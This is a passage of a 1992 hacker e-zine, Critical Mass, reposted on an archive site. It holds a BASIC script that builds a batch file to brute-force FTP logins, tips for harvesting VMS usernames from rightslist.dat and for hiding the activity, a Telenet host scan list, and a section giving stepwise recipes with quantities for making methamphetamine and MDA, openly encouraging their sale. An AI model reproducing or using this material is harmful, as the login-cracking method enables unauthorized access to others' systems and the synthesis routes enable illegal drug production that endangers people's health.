VMS accounts usually default there passwords to the username! In one case,
using this method, I cracked 166 account on a system in Utah! No shit!


<Title: Multiple Usernames, Multiple Passwords>


5 on error goto 200 ! Handles Them EOF's

10 open "username.dat" for input as#1 ! Opens Username File
open "password.dat" for input as#2 ! Opens Password File
open "hack.bat" for output as#3 ! Our Electro-Hacker Hero

20 flag=1 ! Determines Who Got The
input#1,user$ ! EOF

30 flag=2 ! Determines Who Got The
input#2,pass$ ! EOF

40 input#3,"$ ftp <target address> /user="+user$+" /pass="+pass$

print#3,"quit" ! Try and exit

50 goto 30

200 resume 210
210 if flag=2 then ! If At The End Of Pass
close#2 ! File, Close It, Get
open "password.dat" for input as#2 ! Another User And
goto 20 ! Start Over

220 if flag=1 then ! If At The End A User
close#1 ! File, Close And Exit.
close#2
close#3
end




Okay, that should pretty much cover your needs. There are only
a few drawbacks to FTP Batch Hacker. It sometimes requires a bit of disk
space, so is you have a disk quota of a hundred blocks, forget about it.

I would also like to say that when you actually use this
method, It would be very wise to change the names for the files used by the
programs above. After all, it don't look to cool to have "passhacker.bat" in
the queue for all to see! Yesh!

Before I end this article, I would like to include one more detail
that works really nice with this method. Lets say your on this really nice
VAX/VMS and ya want to keep you access there as long as possible. What you
need is as many accounts as possible. Heres what I do, type the following
at DCL........

Type sys$common:[sysexe]rightslist.dat

This will dump all usernames <And group names to> along with alot of
random <well, random to use> ctrl characters. Capture this, and write a filter
and re-upload the nice clean userlist. After that, run one of these guys with
the user's you got and I can almost bet ya that you will get at least a few
accounts.
This works really great when you use the DECNET to jump on other
systems that are a part of the network! You can Sometimes
crack open a entire cluster <Or two, three, four, etc, etc!>.

Well, thats all there is to it. That simple and fun. Also, if anyone
writes a good filter for rightslist ON a VMS system, I would very much like
to see your code, because I have had one hell of a time getting one to
work myself.......


Note: After producing this article, I found out why the FTP never makes logs
of invalid attempts. The reason is because because most of the time
the people who have setup the system have not went though all the
security means to keep stuff like this from happening. Not to worry
though. I have only seen one system out of about 100 that actually
had there FTP server setup right. The reason that they had it setup
right was because they where FTP hacked so many times by fellow SAOO
members, that they figured it out. Those people are at FSU, so don't
hack on 'em or use this method on 'em. They got enough problems as it
is.

If you do not wish to write your own Rightslist filter, there are
ton of RL filters written by SAOO members. They are Phill <any version
higher than 1.0 for speed>, Written by Dementia Meister and Abigail
Natias, and also RIF <For VAX/VMS, and by far the quickest because
you never need to download the RL file, because it filter's it
online>, which is written in C. Created by Laiazon and Tech advisor -
The Beaver.

<Phill was also included with this issue of Critical Mass!>



<C>1992 ---==<Beaver>==---



______________________________________________
l l
l Generic SAOO Telenet Directory l
l Part II l
l Scanned By The Beaver l
l____________________________________________l






Information on Telenet:


The First thing you need to do is obtain a dialup list. To do
this, call 1-800-424-9494 <1200 7E1, or 1200 8N1 with hit bit
striping on>. Once on, you will receive a "TERMINAL=", which at
this point, enter your terminal type, or just press return <TTY>.
You will now get a "@" prompt. From here type "c mail". At
the "Username?" prompt, enter "phones" and the same for the
"Password?" prompt. At this point, simply follow the directions,
and you will get your local dialup<s>. One thing I would like to
note, when using the 300/1200 dialups, when you connect, simply hit
return a few times. When using the 2400 dialups, you must enter "@"
followed by a carriage return.

For more information on Telenet, I advise you to get
Hacker's Unlimited issue#1 or LOD/H Technical Journal for more
information on Telenet. I did not wish to make this a text file on
Telenet, but rather a directory of listings scanned by myself and
fellow S.A.O.O members.

The "area" that is implied in this list basicly means that is the
overall area that was covered. Just because a machine was found in a scan
in a specific area does not always mean it IS in that area. At the bottom
of the list for "interconnecting" hosts.



Part I consisted of the New York and half the Washington D.C.
area. In this issue is the rest of the D.C. along with 904,
305 and the 404. Please enjoy.





Prefix: 904 <North Florida Area> Scanned: 0-999

Suffix Information O/S
------ -------------------------------------------------------------- ----
163 - Refuse Collect Calls
231 - Refuse Collect Calls
236 - Refuse Collect Calls
237 - Refuse Collect Calls


Prefix: 305 <South Florida Area> Scanned: 0-999

Suffix Information O/S
------ -------------------------------------------------------------- ----
004 - Martin Marietta - SIM3278
022 - INH6.NET.FDP <404 60033>
034 - Martin Marietta Proprietary Network VM
035 - "ENTER SWITCH CHARACTERS" Unknown
059 - ".INVALID COMMAND", VTAM?
105 - Refuse Collect Calls
106 - Refuse Collect Calls
120 - Refuse Collect Calls
121 - Refuse Collect Calls
122 - Refuse Collect Calls
130 - Unknown
135 - Refuse Collect Calls
136 - INH6.NET.FDP <404 60033>
140 - ".INVALID COMMAND" , VTAM?
141 - "Select Desired System:" Server
142 - Telenet PAD
145 - Telenet PAD
149 - S901.net.buc
150 - Refuse Collect Calls
156 - Telenet PAD
162 - Unknown
170 - Refuse Collect Calls
171 - "ENTER SWITCH CHARACTERS"
172 - Unknown
175 - Telenet PAD
177 - Unknown
178 - s901.net.bus
237 - Comcast Information Service VM
241 - Unknown
245 - Refuse Collect Calls
247 - "SEND" Unknown
250 - "aci login:" Unix.
253 - "PACKET/74" SNA, must be IBM
254 - "PACKET/74"
339 - "PACKET/74"
342 - Refuse Collect Calls
347 - "PACKET/74"
362 - Clarion Software On-line Info. Service, type "new" for new user
363 - Clarion Software
364 - Clarion Software
365 - Clarion Software
366 - Clarion Software
370 - Refuse Collect Calls
371 - VAX/VMS in Another Laug! VAX/VMS
372 - Refuse Collect Calls
438 - Refuse Collect Calls
461 - Refuse Collect Calls
463 - Martin Marietta VM
464 - Refuse Collect Calls
465 - Unknown
467 - HP Unix
471 - Unknown
472 - Refuse Collect Calls
566 - Busy At Scan
567 - Busy At Scan
644 - ".INVALID COMMAND"
645 - ".INVALD COMMAND"

Interconnection:

[305136 - 404 60033]


Prefix: 202 <Washington D.C Area> Scanned: 400-999 <See CM#6 for 0-400>

Suffix Information O/S
------ -------------------------------------------------------------- ----
403 - Refuse Collect Calls
433 - Refuse Collect Calls
447 - Access Not Allowed From PAD
448 - Access Not Allowed From PAD
449 - Access Not Allowed From PAD
453 - Telenet PAD
454 - VAX/VMS GBS VAX/VMS
455 - Refuse Collect Calls
456 - Refuse Collect Calls
458 - Refuse Collect Calls
459 - Refuse Collect Calls
462 - Access Not Allowed From PAD
463 - Access Not Allowed From PAD
465 - Refuse Collect Calls
466 - Refuse Collect Calls
467 - Refuse Collect Calls
468 - Refuse Collect Calls
469 - Refuse Collect Calls
472 - Refuse Collect Calls
473 - Access Not Allowed From PAD
474 - Access Not Allowed From PAD
475 - Access Not Allowed From PAD
477 - "UPI>" Unknown
478 - "UPI>" Unknown
479 - "UPI>" Unknown
550 - "UPI>" Unknown
555 - Access Not Allowed From PAD
616 - Refuse Collect Calls
617 - Refuse Collect Calls
652 - Refuse Collect Calls
653 - Refuse Collect Calls
654 - Refuse Collect Calls
810 - Telenet Async to 3270


Prefix: 404 <North Georga Area> Scanned: 0-999

Suffix Information O/S
------ --------------------------------------------------------------- ----

005 - Connects/disconnects with no disconnect msg
022 - Refuse Collect Calls
029 - Telenet PAD?
053 - VTAM Server
057 - Unknown
059 - Unknown
070 - Unknown
077 - Unknown
079 - Unknown
113 - Refuse Collect Calls
114 - Refuse Collect Calls
124 - Access Not Allowed From PAD
127 - Access Not Allowed From PAD
128 - Access Not Allowed From PAD
140 - Access Not Allowed From PAD
141 - Access Not Allowed From PAD
142 - Access Not Allowed From PAD
143 - Unknown
161 - Connect/disconnects
162 - Connect/disconnects
168 - Unknown
171 - "OK" Unknown
244 - Connect/disconnects
247 - Unknown
277 - Connect/disconnects
343 - Access Not Allowed From PAD
344 - Access Not Allowed From PAD
349 - Primenet
351 - Unknown VAX/VMS
352 - Unknown VAX/VMS
358 - "Please login to network U:"
359 - "Please login to network U"
362 - Access Not Allowed From PAD
372 - System/88
373 - System/88
374 - Refuse Collect Calls
375 - "Please login to network U:"
532 - Refuse Collect Calls
556 - Refuse Collect Calls
557 - Refuse Collect Calls
558 - Refuse Collect Calls
559 - Refuse Collect Calls
560 - Unknown VAX/VMS
633 - Unknown VAX/VMS
635 - Unknown VAX/VMS
60033 - INH6.NET.FDP



---------------------------------------------

Hidding Directories
By Dementia Meister
----------------------------------

Here is how to really hide directorys. First off, you need a HEX-Editor,
like DISKEDIT.EXE from Norton Utilities v6.01(the one I recommend). Then
you need a directory that you want to hide. Warning: Play/test this
method out on a floppy first so you do not screw up your HD. I have lost
many of data (my fault, by lack of knowledge). This method is relatively
safe as long as you do not calibrate, speedisk, etc.. your HD. Well back
to the task at hand, go into the HEX-Editor and find your DIR. Now this
is the tricky part. Go to the DIR name and change it to an ext. only,
plus add the HIDDEN attribute to it. Now almost nothing can find your
DIR, not NCD, not DOS, not anything BUT a HEX-Editor that you manually
go and find. To UNHIDE the DIR, you go into the HEX-Editor find the
DIR change it to a legitamate name and wall-la<GRIN> you have it.


ThanX from the EDITOR of this INFO.
-=[ ]). |\|\. ]=-
(Dementia Meister)




Welcome to Down and Dirty Chemistry 101


This file is for those who wish to make drugs in thier own home, to sell
or just to take. Unlike most how to files on dope manufacture, this one is
for people who are more worried about getting dope made than getting it 100%
pure and of pharmacutical quality. These methods are the quickest and most
simple around. You don't need a PhD. to make these compounds, but a little
knowledge of chemistry is a must.

* DISCLAIMER *
This where most people leave a message about how the file is for informa-
tional use only. BULLSHIT, if you are old enough to make these drugs then you
are old enough to decide for yourself if you want to take them or not. I say
go right ahead, make 'em then take 'em. Yea it's illegal, so BE CAREFUL, but
if you aren't going to use this file then why keep it? pass it on to someone
who will, and scam some of thier first batch as an info retrieval fee.


TYRAMINE

Tyramine is a fairly potent stimulant that is found naturally in cheese.
Don't even t

  
hink about extracting it. It is easily made from the amino acid
tyrosine by decarboxilating it. Tyrosine is rather carefully watched by the
DEA, so don't buy it from a chem. supply comany, no matter how much cheaper
it is there. It is available as the free form amino acid from most any health
food store.
To decarboxilate the tyrosine at home, simply heat it with barium hydroxide
and seperate tyramine from the solution. Tyramine and tyrosine are both only
slighty soluble in water, so filtering with hot water should remove most of
the impurities and leave you with tyramine and unreacted tyrosine. The entire
synthesis could take place in a coffee pot.



* MUSCIMOLE *

This is another drug with a synthesis so easy, it is funny. It is the
active compound in many old world mushrooms, and may well be the first drug
that early man tripped on. I have never tried it, but I heard that it can
cause a few unpleasent effects (muscle twitching, dizziness). It is still
legal in some states and ibotenic acid is fairly sfe to order from a supply
company.
To make muscimole, reflux ibotenic acid in 10 times it's weight of water.

* METHAMPHETAMINE *

Crank, crystal meth, wire: all words known and loved by speed freaks around
the world. This is the mother of all amphetamines, a small line will wire you
for 12 hours. There are many ways to go about making crank, if you have
access to an organic chemistry lab. For those who don't, this may be the
simplest approach. This method uses ephedrine as the main precurser because
it is very similar in structure to crank. Look them both up and see.
All you need to do is replace an OH group with a hydrogen atom.............
No Problem. Ephedrine is available from suppliers in the back of magazines
(Penthouse, Cosmopoliton) for about $20 for 1,000 25mg tablets, just extract
the pure ephedrine out.
Put a 2 liter flask into an ice bath with a stirrer in one neck and at
least one neck to pour chemicals into. Add 360 ml chloroform, then 360 g of
phosphorus pentachloride and stir for 1/2 hour. Then add 240 g of ephedrine
hydrochloride over 45 minutes, put in 60 ml more chloroform, and stir for 2
hours. Let the brew stand in ice for 45 min. and decant the juice off, DON'T
let the left over PCl5 come over, filter if any does. Add mineral spirits
until the total volume is 4 liters, then let the chlorephedrine crystalize
in the freezer for an hour. Filter and dry your crystals.
To make methamphetamine from chlorephadrine you must replace the Cl atom
with a hydrogen. There are many catalysts that will work, zinc is cheap and
easy to get, but gives a rather low yield of speed. Palladium is probably the
best way to go.
Take a champagne bottle, 2L is a good size, and wrap it in duct tape to be
safe. Add 50g anhydrous sodium acetate and 700ml of distilled water. Make a
buffer solution by adding acetic acid until the pH is 7. Add 2g of palladium
, either on charcoal or barium sulfate, then 125g of chlorephadrine. Attach
a cylender of H gas and increase to 30lbs pressure. Keep this pressure up
for several hours, until H stops being absorbed. Stir with magnetic stirer
or if need be just shake it regularly over the whole time.
Decant off the liquid and filter to remove the catalyst. make the solution
strongly basic (pH 10-11) with NaOH and shake like hell for about 5 min.
Extract with Benzene and discard the water layer. Fractional distillation
is required to seperate the chorephadrine from the meth, the meth comes over
first followed immediatly by chlorephadrine.
Palladium black on charcoal is on the DEA watched chemical list, be careful
obtaining it. The Merk index should have a formula for making it. If you go
with the zinc use about twice as many moles as you would with palladium.


*MDA*


Ahh, the origional love drug! This is essentially the same as XTC, but as
it is easier to make and stronger I will give this formula instead.
Safrole is the main precurser and can be obtained in sasafrass oil which
is available at any store that sells herbs, it is about 80% safrole by volume
and pure safrole can be distilled from the oil under a vacuum. When the
distillate appears to be a homogenious oil, collect it in a clean flask, this
is safrole.
In a glass vessel, in an ice bath, slowly add 450g concentrated sulfuric
acid to 400g acetonitrile. Keep the temperature under 10 degrees C while
making the addition. Take the mixture out of the ice bath and add 236g safrole
Stir occasionally and watch the temperature. When the solution reaches 80 deg.
C put the flask back in the ice bath and then pour into a gallon of ice water
with 18 oz NaOH in it. Stir while pouring.
Decante the yellow oily layer on top into another flask. Add 10 times the
volume of 10% KOH in 190 proof vodka. Reflux for 6 hours. Boil away most of
the alcohol under a vacuum. Add water to dissolve the KOH and extract your
dope with benzene. Distill under a vacuum and collect the fraction coming
over at about 125 deg. C (at about 20 torr). Crystallize in your freezer, and
filter. Dry the crystals. One "hit" is about 100mg.


This is all the space and time I have to write. Expect D$DChem II in the
next issue of Critical Mass. If you have any questions or comments you can
reach me on any SAOO support bbs. Address mail to Art Phish. I would be happy
to include any synthesis that is requested in the next issue.


Art Phish



_________________________________________

Closing Notes
__________________________




Welp, that concludes yet another fine issue of Critical Mass. In
issue number 8, perpare yourself for the following......

SAOO Telenet Directory Part III
Hacking The Department Of Motor Vec.
More Chemistry, from Art Phish
Probably a article on Telenet considering the resent questions
I have received.


An much, much more! If you would like to be involved in
computer conference, please leave The Beaver Email at one of the
location given at the beging of this issue of Critical Mass.
Until the next issue, chow... And Happy, Safe! hack'in.


If you have any article pretaining to not so often
talked about subjects, please E-mail the Beaver. Also, after
the writing of "How to take DEC Servers Off the air", there
seemed to be the misconception on why the article was produced.
It seems that some people believed that the article was put
out because I am "a bad person whom only likes destroying data".
This is a pretty far fetched thing to say. Shortly after the
articles release, I heard that a friend of mine at DOR <Dept.
of Revenue> read that part and then secured there server more.
That, my friend, was the purpose of the article. To get information
out there, among the people. Till the next CM, I guess I will
be seeing ya on the nets.... Chow!


---==<Beaver>==---


Member S.A.O.O.

← previous
next →

Comments

1
guest's profile picture
@guest

I was recommended this website by my cousin. I will be not sure whether this post is written by simply him as nobody else know such detailed about our trouble.
You? re also amazing! Thanks!

3 years ago
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT